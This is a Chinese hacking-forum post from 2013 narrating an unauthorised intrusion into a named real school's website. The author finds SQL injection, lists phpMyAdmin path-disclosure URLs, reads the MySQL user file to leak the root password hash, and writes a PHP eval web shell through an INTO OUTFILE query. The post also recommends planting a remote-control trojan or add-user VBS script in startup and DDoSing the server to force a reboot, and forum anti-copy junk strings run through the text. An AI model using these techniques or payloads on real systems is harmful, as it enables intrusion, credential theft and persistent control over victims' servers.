找回密码
 立即注册
查看: 3261|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏; q) }2 |( A) Y& c0 Y
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!
+ r% `+ _0 l; G: J, ^( s
6 W6 I7 t1 i) ?
0 N8 L3 c1 |- R% L. V- W* {# v5 L6 L! h0 E: c( F4 g& ^% C: y7 q% @
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 ) k! q3 Z1 c7 Q8 r& d: [

6 A7 b$ I- O  X% ]$ E+ a那么想可以直接写入shell ,getshell有几个条件:
3 ?" b6 f7 A) a+ R
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF
2 Z: Z6 z6 |- h) C% C1 q0 N2 l5 O+ z0 m: e8 a* f$ [( ?) o
试着爆绝对路径:$ K7 ?$ F2 R6 D7 p# N
1./phpMyAdmin/index.php?lang[]=1  
& t! ]" E  y4 z; C( t, G2 [3 L2./phpMyAdmin/phpinfo.php  # w; O% f& x6 s. r1 P
3./load_file()  
' N  f0 H2 V& G* x$ v: E- ~4./phpmyadmin/themes/darkblue_orange/layout.inc.php  : P. T! ?7 k; N" l0 T3 I) w
5./phpmyadmin/libraries/select_lang.lib.php  
8 V6 N; f: B% B6 O8 ~$ j2 W3 s0 E6./phpmyadmin/libraries/lect_lang.lib.php  
% p& T6 \* W; y/ O$ V9 u7 G+ A& |# F7./phpmyadmin/libraries/mcrypt.lib.php   
2 c& D: ~5 d7 `9 v4 f' ?' e8./phpmyadmin/libraries/export/xls.php  ! d: L% |$ V1 \& E$ {

2 P' R5 V+ s& B9 ?2 F( }均不行...........................9 d# I' m% p- R) Q

+ i; k9 ]" _$ G# m( d: k御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php% m" `5 z3 G- }2 e+ O; T

0 V' k6 R" U) ]6 a& s权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin - n5 p, A) e: N+ _' \

/ G1 s: E: x' V/ z5 F& N默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败! G0 I, Q( j* `/ {. ~6 Z  Y! @! _
9 q0 `7 Q1 b/ b/ _9 H
敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........
8 a! L7 }4 ~3 W( K* c; W0 u2 t
& r3 n. P1 `& E% `2 S+ W想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
* j2 N" j( _3 O% u: c' i
; I! k' O6 a! s# Shttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini 5 ?6 o  {( u. w+ y

9 U0 l* Y; G, s- Q自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
+ _( [, u4 G4 ^. A% P. `3 \$ U' T4 t5 k3 Q
成功读到root密码:( ]; K" R) H# t; B& m* n

# a, \2 X; [0 B6 R1 n17---- r(0072)
: k( o6 ]( a* l; h/ y) T" O18---- o(006f)0 c* K  {/ A7 ^) U/ R& e& }7 [# p
19---- o(006f)) Y, f0 v% q  q4 P' g# A) F( W3 `
20---- t(0074)  Y* h1 l* f. q4 ^" u/ @' Y' b3 n
21---- *(002a)
+ }2 Y; p. O6 ~, ~/ x& Z1 d7 y22---- 8(0038)6 L0 r! w+ j4 d. B7 o
23---- 2(0032)
" z$ d0 f5 M% s8 M- x+ ~( M24---- E(0045); H0 C) z, Z+ M$ g+ I  U1 ~- v8 ~
25---- 1(0031)) u6 K+ d- b/ z% ]
26---- C(0043)
) m+ w" [  _9 d0 `1 |27---- 5(0035)& x- v/ a5 j4 p! S: X* |" l
28---- 8(0038)
" J1 A8 h* d1 [, {* j+ V1 Z2 S29---- 2(0032)( n# C5 ]0 i5 y" u( C
30---- 8(0038)
0 S+ c* A% ]1 r9 r31---- A(0041)
2 E: U* R4 X* J: A+ R32---- 9(0039)
0 K4 j% m1 s) A33---- B(0042)1 Q2 l5 I" E0 m  {6 U4 d) k" x  m
34---- 5(0035)
( Z! k  [" Z! n6 M6 s9 ^" P35---- 4(0034)6 P" W( k5 B# G! o( W5 }
36---- 8(0038)4 }  O0 f" r" j  ]3 t4 D
37---- 6(0036)
3 z( r* I/ X$ c5 l38---- 4(0034): v) J1 h: K' X
39---- 9(0039)
/ \8 f  H$ Y# T  l0 E40---- 1(0031)+ K1 p: N" C$ ?4 `8 [3 W7 c2 i5 o
41---- 1(0031)3 S" l8 |* r; Q& X
42---- 5(0035)& g+ T* Q0 z  k9 w. v
43---- 3(0033)
# ^" w. _8 u, I, v  H" K' }44---- 5(0035)
% p+ |9 p* B* P+ W6 K3 c+ v& b45---- 9(0039)* k4 O( F/ P3 C9 D; ~. X  H* F5 a' N
46---- 8(0038), ]: p1 r8 n8 S
47---- F(0046)
+ W2 A' i, \4 i  j& T5 d, o48---- F(0046)
+ H+ {' E+ W, T! T/ u# ~49---- 4(0034)
$ s, s7 f# f7 f  L8 l50---- F(0046)6 h. g) j* Z& O: J% F2 D
51---- 0(0030). k; k+ j7 g) q: R  u" K+ m& U
52---- 3(0033)
8 h: {: A" l' N+ T53---- 2(0032)! G  n: r  j8 d" Y
54---- A(0041)
5 R% j. \! _/ ^$ j1 d$ Z% s+ i' u55---- 4(0034)
9 c. h& C$ @6 I6 t% d4 V7 c. I# e56---- A(0041)
1 _; G- k8 y0 h  F3 I57---- B(0042)
9 e4 d! e+ P5 i# ~: u0 f58---- *(0044)8 F1 e) s5 Z4 v" I9 S
59---- *(0035)
) G  M& j& ^3 M5 ~5 C6 D60---- *(0041)
5 Q& a2 i3 C) V( s* E0 l$ F' h' N61---- *0032)8 h, U  O0 d) l  x+ o! [

8 r) Y7 q& [# q( ^  x8 |! N解密后成功登陆phpmyamin: z3 ~7 y5 \3 ~# o+ T1 h$ |& j
                          $ D/ _" t, Q) }% _7 S6 R5 T/ c! i
: x/ z& s  ]  j
                             
* ?0 d9 |8 S) H: o: f& w" j5 [( z+ p. [
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'. @% P! \+ J: V# B

3 ^) l# n" i' B/ M' A成功执行,拿下shell,菜刀连接:
0 d7 G$ @, @. F& W% n( V; S. A4 F& R
服务器不支持asp,aspx,php提权无果...................
+ ~4 q2 a" {6 D+ D( R
% l- F' ]. ?( I; o! l- x: ~但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
) N1 p5 ]8 J- {
服务器上已经有个隐藏帐号了

$ G- w8 f5 U( A6 O* y+ t
别名     administrators
! \$ x4 n  O$ I3 ^4 D注释     管理员对计算机/域有不受限制的完全访问权

% q6 i5 [  J8 m3 |
成员
8 ]& q7 A( ~- S1 d! E7 E
-------------------------------------------------------------------------------7 t6 D6 ^5 C# Y" }1 `
admin
- c1 E6 X; w. `# J- s5 UAdministrator
7 I3 U5 k7 E4 L; s3 Aslipper$6 t3 h7 w& ]# z% |; G
sqluser6 C# M- ]$ c9 a6 ~9 O& @1 p$ W& x
命令成功完成。
; O. c% D7 ]& A5 G* [+ ~" e4 I! e/ R+ k6 N
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
' ~+ ]6 P% K5 M
  X* T% M, n$ x6 gddos服务器重启,不然就只能坐等服务器重启了...............................
" d# j8 {0 ~, j+ n( V; R/ b7 W2 g
% |8 |; h7 Y% `  h8 J$ h" ~      
5 u( E9 Y1 ^; B( [6 f

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表